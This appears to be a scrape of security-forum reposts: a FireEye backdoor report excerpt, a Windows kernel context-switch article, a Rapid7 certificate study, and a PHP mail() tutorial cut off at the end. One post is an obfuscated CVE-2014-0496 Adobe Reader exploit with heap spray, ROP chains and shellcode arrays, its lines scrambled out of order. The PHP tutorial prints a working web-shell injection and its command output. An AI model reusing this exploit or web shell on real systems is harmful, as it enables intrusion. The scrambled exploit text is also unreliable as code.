9002/HOMEUNIX samples in our repository have compile dates from 2009 or 2010. Interestingly enough, there is some overlap with a cluster detailed in a report we released in November of last year, specifically the “AllShell” cluster (C2: smtp.allshell[.]net). Starting in mid-2012, GREF started using the Kaba/SOGU backdoor. These early samples, which were discussed in great detail by LastLine in their blog post “An Analysis of PlugX,” are usually bundled into a RAR self-extracting executable and uses the three-part loading mechanism consisting of an executable, the malicious DLL that is side-loaded, and the shellcode file. In mid-2013, GREF switched to using a new Kaba/SOGU builder that created binaries with unique metadata. For example, many of these samples create a mutex of “PST-2.0” when executed, and some have the shared “HT Applications” version metadata. Conclusion The “A” in APT is generally used to describe the threat actors as “Advanced”, but with this blog, we also see that they are also “Adaptable.” Not only have they adopted new Windows-based backdoors over time, as Apple’s OS X platform has increased in popularity in many companies, they have logically adapted their toolset to match in order to gain and maintain a persistent foothold in the organizations they are targeting. OS X has gained popularity across enterprises, from less savvy users who find it easy to operate, to highly technical users that utilize its more powerful features, as well as with executives. Many people also consider it to be a more secure computing platform, which may lead to a dangerous sense of complacency in both IT departments and with users. In fact, while the security industry has started offering more products for OS X systems, these systems are sometimes less regulated and monitored in corporate environments than their Windows peers. Clearly as the OS X platform becomes more widely adopted across enterprises, threat groups like GREF will continue to adapt and find ways to exploit that platform. Credit to Jay Smith for his initial analysis of the Windows version of the XSLCmd backdoor and Joshua Homan for his assistance in this research. Appendix 1: XSLCmd for OS X created files [TABLE=width: 100%] [TR] [TD=width: 56%]Filename[/TD] [TD=width: 43%]Purpose[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/LaunchAgents/clipboardd[/TD] [TD=width: 43%]executable[/TD] [/TR] [TR] [TD=width: 56%]/Library/Logs/clipboardd[/TD] [TD=width: 43%]executable when run as super user[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/LaunchAgents/com.apple.service.clipboardd.plist[/TD] [TD=width: 43%]plist for persistence[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/pxupdate.ini[/TD] [TD=width: 43%]configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/chkdiska.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/chkdiskc.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/Logs/BackupData/<year><month><day>_<hr>_<min>_<sec>_keys.log[/TD] [TD=width: 43%]key log file[/TD] [/TR] [/TABLE] Sursa: Forced to Adapt: XSLCmd Backdoor Now on OS X | FireEye Blog
  14. Windows Internals - A look into SwapContext routine Hi, Here I am really taking advantage of my summer vacations and back again with a second part of the Windows thread scheduling articles. In the previous blog post I discussed the internals of quantum end context switching (a flowchart). However, the routine responsible for context switching itself wasn't discussed in detail and that's why I'm here today. Here are some notes that'll help us through this post : 1 - The routine which contains code that does context switching is SwapContext and it's called internally by KiSwapContext. There are some routines that prefer to call SwapContext directly and do the housekeeping that KiSwapContext does themselves. 2 - The routines above (KiSwapContext and SwapContext) are implemented in ALL context switches that are performed no matter what is the reason of the context switch (preemption,wait state,termination...). 3 - SwapContext is originally written in assembly and it doesn't have any prologue or epilogue that are normally seen in ordinary conventions, imagine it like a naked function. 4 - Neither SwapContext or KiSwapContext is responsible for setting the CurrentThread and NextThread fields of the current KPRCB. It is the responsibility of the caller to store the new thread's KTHREAD pointer into pPrcb->CurrentThread and queue the current thread (we're still running in its context) in the ready queue before calling KiSwapContext or SwapContext which will actually perform the context-switch. Usually before calling KiSwapContext, the old irql (before raising it to DISPATCH_LEVEL) is stored in CurrentThread->WaitIrql , but there's an exception discussed later in this article. So buckle up and let's get started : Before digging through SwapContext let's first start by examining what its callers supply to it as arguments. SwapContext expects the following arguments: - ESI : (PKTHREAD) A pointer to the New Thread's structure. - EDI : (PKTHREAD) A pointer to the old thread's structure. - EBX : (PKPCR) A pointer to PCR (Processor control region) structure of the current processor. - ECX : (KIRQL) The IRQL in which the thread was running before raising it to DISPATCH_LEVEL. By callers, I mean the KiSwapContext routine and some routines that call SwapContext directly (ex : KiDispatchInterrupt). Let's start by seeing what's happening inside KiSwapContext : This routine expects 2 arguments the Current thread and New thread KTHREAD pointers in ECX and EDX respectively (__fastcall). Before storing both argument in EDI and ESI, It first proceeds to save these and other registers in the current thread's (old thread soon) stack: EBP : The stack frame base pointer (SwapContext only updates ESP). EDI : The caller might be using EDI for something else ,save it. ESI : The caller might be using ESI for something else ,save it too. EBX : The caller might be using EBX for something else ,save it too. Note that these registers will be popped from this same thread's stack when the context will be switched from another thread to this thread again at a later time (when it will be rescheduled to run). After pushing the registers, KiSwapContext stores the self pointer to the PCR in EBX (fs:[1Ch]).Then it stores the CurrentThread->WaitIrql value in ECX, now that everything is set up KiSwapContext is ready to call SwapContext. Again, before going through SwapContext let me talk about routines that actually call SwapContext directly and exactly the KiDispatchInterrupt routine that was referenced in my previous post. Why doesn't KiDispatchInterrupt call KiSwapContext ? Simply because it just needs to push EBP,EDI and ESI onto the current thread's stack as it already uses EBX as a pointer to PCR. Here, we can see a really great advantage of software context switching where we just save the registers that we really need to save, not all registers. Now , we can get to SwapContext and explain what it does in detail. The return type of SwapContext is a boolean value that tells the caller (in the new thread's stack) whether the new thread has any APCs to deliver or not. Let's see what SwapContext does in these 15 steps: 1 - The first thing that SwapContext does is verify that the new thread isn't actually running , this is only right when dealing with a multiprocessor system where another processor might be actually running the thread.If the new thread is running SwapContext just loops until the thread stops running. The boolean value checked is NewThread->Running and after getting out of the loop, the Running boolean is immediately set to TRUE. 2 - The next thing SwapContext does is pushing the IRQL value supplied in ECX. To spoil a bit of what's coming in the next steps (step 13) SwapContext itself pops ECX later, but after the context switch. As a result we'll be popping the new thread's pushed IRQL value (stack switched). 3 - Interrupts are disabled, and PRCB cycle time fields are updated with the value of the time-stamp counter. After the update, Interrupts are enabled again. 4 - increment the count of context switches in the PCR (Pcr->ContextSwitches++; ) , and push Pcr->Used_ExceptionList which is the first element of PCR (fs:[0]). fs:[0] is actually a pointer to the last registered exception handling frame which contains a pointer to the next frame and also a pointer to the handling routine (similar to usermode), a singly linked list simply. Saving the exception list is important as each thread has its own stack and thus its own exception handling list. 5 - OldThread->NpxState is tested, if it's non-NULL, SwapContext proceeds to saving the floating-points registers and FPU related data using fxsave instruction. The location where this data is saved is in the initial stack,and exactly at (Initial stack pointer - 528 bytes) The fxsave output is 512 bytes long , so it's like pushing 512 bytes onto the initial stack , the other 16 bytes are for stack-alignment I suppose.The Initial stack is discussed later during step 8. 6 - Stack Swapping : Save the stack pointer in OldThread->KernelStack and load NewThread->KernelStack into ESP. We're now running in the new thread's stack, from now on every value that we'll pop was previously pushed the last time when the new thread was preparing for a context-switch. 7 - Virtual Address Space Swapping : The old thread process is compared with the new thread's process if they're different CR3 register (Page directory pointer table register) is updated with the value of : NewThread->ApcState.Process->DirectoryTableBase. As a result, the new thread will have access to a valid virtual address space. If the process is the same, CR3 is kept unchanged. The local descriptor table is also changed if the threads' processes are different. 8 - TSS Esp0 Switching : Even-though I'll dedicate a future post to discuss TSS (task state segment) in detail under Windows , a brief explanation is needed here. Windows only uses one TSS per processor and uses only (another field is also used but it is out of the scope of this article) ESP0 and SS0 fields which stand for the kernel stack pointer and the kernel stack segment respectively. When a usermode to kernelmode transition must be done as a result of an interrupt,exception or system service call... as part of the transition ESP must be changed to point to the kernel stack, this kernel stack pointer is taken from TSS's ESP0 field. Logically speaking, ESP0 field of the TSS must be changed on every context-switch to the kernel stack pointer of the new thread. In order to do so, SwapContext takes the kernel stack pointer at NewThread->InitialStack (InitialStack = StackBase - 0x30) ,it substrats the space that it has used to save the floating-point registers using fxsave instruction and another additional 16 bytes for stack alignment, then it stores the resulted stack pointer in the TSS's Esp0 field : pPcr->TssCopy.Esp0 (TSS can be also accessed using the TR segment register). 9 - We've completed the context-switch now and the old thread can be finally marked as "stopped running" by setting the previously discussed boolean value "Running" to FALSE. OldThread->Running = FALSE. 10 - If fxsave was previously executed by the new thread (the last time its context was switched), the data (floating-point registers...) saved by it is loaded again using xrstor instruction. 11 - Next the TEB (Thread environment block) pointer is updated in the PCR : pPcr->Used_Self = NewThread->Teb . So the Used_Self field of the PCR points always to the current thread's TEB. 12 - The New thread's context switches count is incremented (NewThread->ContextSwitches++). 13 - It's finally the time to pop the 2 values that SwapContext pushed , the pointer to the exception list and the IRQL from the new thread's stack. the saved IRQL value is restored in ECX and the exception list pointer is popped into its field in the PCR. 14 - A check is done to see if the context-switch was performed from a DPC routine (Entering a wait state for example) which is prohibited. If pPrcb->DpcRoutineActive boolean is TRUE this means that the current processor is currently executing a DPC routine and SwapContext will immediately call KeBugCheck which will show a BSOD : ATTEMPTED_SWITCH_FROM_DPC. 15 - This is the step where the IRQL (NewThread->WaitIrql) value stored in ECX comes to use. As mentionned earlier SwapContext returns a boolean value telling the caller if it has to deliver any pending APCs. During this step SwapContext will check the new thread's ApcState to see if there are any kernel APCs pending. If there are : a second check is performed to see if special kernel APCs are disabled , if they're not disabled ECX is tested to see if it's PASSIVE_LEVEL, if it is above PASSIVE_LEVEL an APC_LEVEL software interrupt is requested and the function returns FALSE. Actually the only case that SwapContext returns TRUE is if ECX is equal to PASSIVE_LEVEL so the caller will proceed to lowering IRQL to APC_LEVEL first to call KiDeliverApc and then lower it to PASSIVE_LEVEL afterwards. Special Case : This special case is actually about the IRQL value supplied to SwapContext in ECX. The nature of this value depends on the caller in such way that if the caller will lower the IRQL immediately upon returning from SwapContext or not. Let's take 2 examples : KiQuantumEnd and KiExitDispatcher routines. (KiQuantumEnd is the special case) If you disassemble KiExitDispatcher you'll notice that before calling KiSwapContext it stores the OldIrql (before it was raised to DISPATCH_LEVEL) in the WaitIrql of the old thread so when the thread gains execution again at a later time SwapContext will decide whether there any APCs to deliver or not. KiExitDispatcher makes use of the return value of KiSwapContext (KiSwapContext returns the same value returned by SwapContext) to lower the IRQL. (see step 15 last sentence). However, by disassembling KiQuantumEnd you'll see that it's storing APC_LEVEL at the old thread's WaitIrql without even caring about in which IRQL the thread was running before. If you refer back to my flowchart in the previous article you'll see that KiQuantumEnd always insures that SwapContext returns FALSE , first of all because KiQuantumEnd was called as a result of calling KiDispatchInterrupt which is meant to be called when a DISPATCH_LEVEL software interrupt was requested.Thus, KiDispatchInterrupt was called by HalpDispatchSoftwareInterrupt which is normally called by HalpCheckForSoftwareInterrupt. HalpDispatchSoftwareInterrupt is the function responsible for raising the IRQL to the software interrupt level (APC_LEVEL or DISPATCH_LEVEL) and upon returning from it HalpCheckForSoftwareInterrupt recovers back the IRQL to its original value (OldIrql). So the reason why KiQuantumEnd doesn't care about KiSwapContext return value because it won't proceed to lowering the IRQL (not its responsibility) nor to deliver any APCs that's why it's supplying APC_LEVEL as an old IRQL value to SwapContext so that it will return FALSE. However, a software interrupt might be requested by SwapContext if there are any pending APCs. KiDispatchInterrupt which calls SwapContext directly uses the same approach as KiQuantumEnd, instead of storing the value at OldThread->WaitIrql it just moves it into ECX. Post notes : - Based on Windows 7 32 bit :> - For any questions or suggestions feel free to leave a comment below or send me an email : souhail.hammou@outlook.com See you again soon -Souhail Sursa: Reverse Engineering 0x4 Fun: Windows Internals - A look into SwapContext routine
  15. [h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0 }); 1 0 obj 2 0 obj 3 0 obj 4 0 obj 5 0 obj 6 0 obj 7 0 obj aaa += aaa; aa=dd13.split("%u"); aa[i]=str12+aa[i]; /AcroForm 6 0 R addButtonFunc = function () { af1="aaaaa%aaaaaaaauaaaaaa"; af1=af1[("112","a2s1","replace")](/a/g,''); app.addToolButton({ app.addToolButton({ app.alert('123'); app.removeToolButton({ as1211(); bbb += aaa; bbb = bbb.substring(0, i11 / 2); bbb += sa; bbb += str; break; ccc += ccc; cEnable: "addButtonFunc();" cEnable: "removeButtonFunc();" cExec: "1", cExec: "1", cName: "evil" cName: "evil", cName: "xxx", </config> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> /Count 1 dd13=aa.join('%u'); dd13=af1+dd13; dd13=xx13.join('%u'); } else { } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { endobj endstream for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141"); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); for (i = 0; i < aa[tt1]; i++) for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141"); function as1211() function heapSpray(str, str_addr, r_addr) { function opp12(xx13) heapSpray(payload, ret_addr, r_addr); if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { if(ccc[tt] >= (0x40000*2)) if(j) if (!r11) { if (vulnerable) { j=4-aa[i][tt1]; /Kids [3 0 R] <</Length 10074>> <</Length 372>> obj_size = 0x330 + 0x1c; obj_size = 0x360 + 0x1c; obj_size = 0x370; /OpenAction 4 0 R /Pages 2 0 R <pageSet></pageSet> /Parent 2 0 R part1 += rop_addr; %%%%%PDF-6.5 PE/%%%%%% <present><pdf><interactive>1</interactive></pdf></present> r11 = true; r_addr = 0x08a8; r_addr = 0x08e4; r_addr = 0x08e8; removeButtonFunc = function () { ret_addr = this[un12]("%u8003%u4a84"); ret_addr = this[un12]("%ua83e%u4a82"); ret_addr = this[un12]("%ua8df%u4a82"); return; return dd13; rop_addr = this[un12]("%u08a8%u0c0c"); rop_addr = this[un12]("%u08e4%u0c0c"); rop_addr = this[un12]("%u08e8%u0c0c"); rop = rop10; rop = rop11; rop = rop9; <</Size 8/Root 1 0 R>> str12=new Array(j+1).join("0"); stream <subform name="form1" layout="tb" locale="en_US"> </subform></template></xdp:xdp> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> trailer tt1=tt1[("112","a2s1","replace")](/a/g,''); tt=tt[("112","a2s1","replace")](/a/g,''); /tYPE/aCTION/S/JavaScript/JS 5 0 R>> /type /Page /Type /Page /Type /Pages un12=''; un12=un12[("112","as1","replace")](/w/g,''); un12="uwnwwewwwswcwwwawwpwe"; var aaa = this[un12]("%u0c0c"); var arr = new Array(); var bbb = aaa.substring(0, i1 / 2); var ccc = bbb.substring(0, i2 / 2); var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); var executable = ""; var i11 = 0x0c0c - 0x24; var i1 = r_addr - 0x24; var i2 = 0x4000 + 0xc000; var i3 = (0x1020 - 0x08) / 2; var obj_size; var part1 = ""; var part2 = ""; var part2_len = obj_size - part1[tt1] * 2; var payload = rop + shellcode; var r11 = false; var r_addr; var ret_addr; var rop; var rop10 = this[("123","1a1",un12)](opp12(xx132)); var rop11 = this[("123","1a1",un12)](opp12(xx131)); var rop9 = this[("123","1a1",un12)](opp12(xx133)); var rop_addr; var sa = str_addr; var shellcode = this[("123","1a1",un12)](opp12(xx134)); var tt1="alaaeaanaaagataaah"; var tt="alaaeaanaagataah"; var vulnerable = true; var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16)); var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16)); var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16)); var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16)); vulnerable = false; while (1) while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa; while (sa[tt] < (xxx - r_addr)) sa += sa; x11=9; <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <</XFA 7 0 R>> <?xml version="1.0" encoding="UTF-8"?> xxx=0x0c0c; Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com
  16. Firma este foarte mare si serioasa, nu e firma de bloc. Recomand celor cu experienta.
  17. Not bad. Fa un video.
  18. [h=1]107,000 web sites no longer trusted by Mozilla[/h]Posted by jnickel in Project Sonar on Sep 4, 2014 3:48:43 PM Mozilla's Firefox and Thunderbird recently removed 1024-bit certificate authority (CA) certificates from their trusted store. This change was announced to the various certificate authorities in May of this year and shipped with Firefox 32 on September 2nd. This change was a long time coming, as the National Institute of Standards and Technology (NIST) recommended that 1024-bit RSA keys be deprecated in 2010 and disallowed after 2013. A blog post at http://kuix.de/blog provided a list of specific certificates that would no longer be trusted starting with Firefox 32. There is a little disagreement that 1024-bit RSA keys may be cracked today by adversaries with the resources of nation states. As technology marches on, the security of 1024-bit keys will continue to deteriorate and become accessible by operators of relatively small clusters of commodity hardware. In the case of a CA key, the successful factoring of the RSA primes would allow an adversary to sign any certificate just as the CA in question would. This would allow impersonation of any "secure" web site, so long as the software you use still trusts these keys. This is certainly a welcome change, but how many sites are going to be affected by the removal of these CA certificates, and, how many of these sites have certificates that aren't due to expire anytime soon? Fortunately there is a means to answer these questions. In June of 2012, the University of Michigan began scanning the Internet and collecting SSL certificates from all sites that responded on port 443. At Rapid7, we started our own collection of certificates starting in September of 2013 as part of Project Sonar, and have been conducting weekly scans since. Both sets of scans record the entire certificate chain, including the intermediate CA keys that Mozilla recently removed from the trusted store. We loaded approximately 150 scans into a Postgres database, resulting in over 65 million unique certificates, and started crunching the data. The first question we wanted to answer, which is how many sites are affected, was relatively easy to determine. We searched the certificate chain for each of the roughly 20 million web sites we index to check if the SHA1 hashes listed in the blog post are present in the signing chain. After several minutes Postgres listed 107,535 sites that are using a certificate signed by the soon-to-be untrusted CA certificates. That is a relatively large number of sites and represents roughly half a percent of all of the web sites in our database. The next question we wanted to explore was how long the 1024-bit CA key signed certificates would continue to be used. This proved to be informative and presents a clearer picture of the impact. We modified the first query and grouped the sites by the certificate expiration date, rounded to the start of the month. The monthly counts of affected sites, grouped by expiration date, demonstrated the full extent of the problem. The resultant data, shown in part in the graph below, makes it clear that the problem isn't nearly as bad as the initial numbers indicated, since a great many of the certificates have already expired and the rest will do so over the next year. Surprisingly, over 13,000 web sites presented a certificate that expired in July of this year. Digging into these, we found that almost all of these had been issued to Vodafone and expired on July 1st. These expired certificates still appear to be in use today. The graph below demonstrates that the majority of affected certificates have already expired and those that haven't expired are due to expire in the next year. We have excluded certificates from the graph that expired prior to 2013 for legibility. While Mozilla's decision will affect a few sites, most of those that are active and affected have already expired, and shouldn't be trusted on that basis alone. In summary, the repeal of trust for these certificates is a sound decision based upon NIST recommendations, and while it initially appeared that a great many sites would be affected, the majority of these sites either have expired certificates or a certificate that expires within the next year. We hope that Chrome and other browsers will also remove these certificates to remove the potential risk involved with these 1024-bit CA keys. Going forward, we are now tracking the certificates presented by SMTP, IMAP, and POP services, and will keep an eye on those as the data rolls in. If you still use a 1024-bit RSA key for any other purpose, such as a Secure Shell (SSH) or PGP, it is past time to consider those obsolete and start rolling out stronger keys, of at least 2048 bits, and using ECC-based keys where available. - Labs Sursa: https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla
  19. Exploit PHP’s mail() to get remote code execution September 3, 2014 While searching around the web for new nifty tricks I stumbled across this post about how to get remote code exeution exploiting PHP’s mail() function. Update: After some further thinking and looking into this even more, I’ve found that my statement about this only being possible in really rare cases was wrong. Since this can also be exploited in other scenarios which is much more common than I first thought. So, instead of removing content, I added a strike through on the statements that’s no longer valid, and updated with a 2nd scenario explanation. First, I must say that this is only going to happen under some really rare circustances. Never the less, it’s really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real life scenario later in this article. So, when that’s said, let’s have a look at what this is all about. When using PHP to send emails we can use PHP’s built in function mail(). This function takes a total of five parameters. To Subject Message Headers (Optional) Parameters (Optional) This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let’s have a look at what the PHP manual has to say about it. The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option. This is really interesting. In short, this say that we can alter the behavior of the sendmail application. Update: I should have added this from the beginning, but just to make this clear: The fifth argument is disabled when PHP is running in safe mode mail() In safe mode, the fifth parameter is disabled. (note: only affected since PHP 4.2.3) Source: PHP: Functions restricted/disabled by safe mode - Manual Now, let’s have a look at the sendmail manual. I’m not going to post the entire manual here, but I will highlight some of the interesting parts. Some interesting parameters -O option=value Set option option to the specified value. This form uses long names. -Cfile Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified. -X logfile Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly. Some interesting options QueueDirectory=queuedir Select the directory in which to queue messages. So how can this be exploited? Remote Code Execution As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, which does not make sense at all that anyone would do it. But it’s still something that really should be kept in mind by developers. With that said, let’s just dive into it! This is the code for exploiting the mail() function $to = 'a@b.c'; $subject = '<?php system($_GET["cmd"]); ?>'; $message = ''; $headers = ''; $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php'; mail($to, $subject, $message, $headers, $options); Let’s inspect the logs from this. First let’s have a look at what we can see in the browser by only going to the rce.php file 11226 <<< To: a@b.c 11226 <<< Subject: 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< Nothing really scary to see in this log. Now, let’s use the cat command in the terminal on the same file > cat rce.php 11226 <<< To: a@b.c 11226 <<< Subject: <?php system($_GET["cmd"]); ?> 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< See anything a bit more interesting? Let’s try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output 11226 <<< To: a@b.c 11226 <<< Subject: total 20 drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 . drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 .. -rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php -rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php -rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< 11226 <<< 11226 <<< 11226 <<< [EOF] Now, let me break it down in case you don’t fully understand the code The first four variables is pretty straight forward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will be executing our commands on the system, followed by empty message and headers. Then on the fith variable is where the magic happens. The $options variable holds a string that will let us write our malicious code get remote code execution to the server. First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The 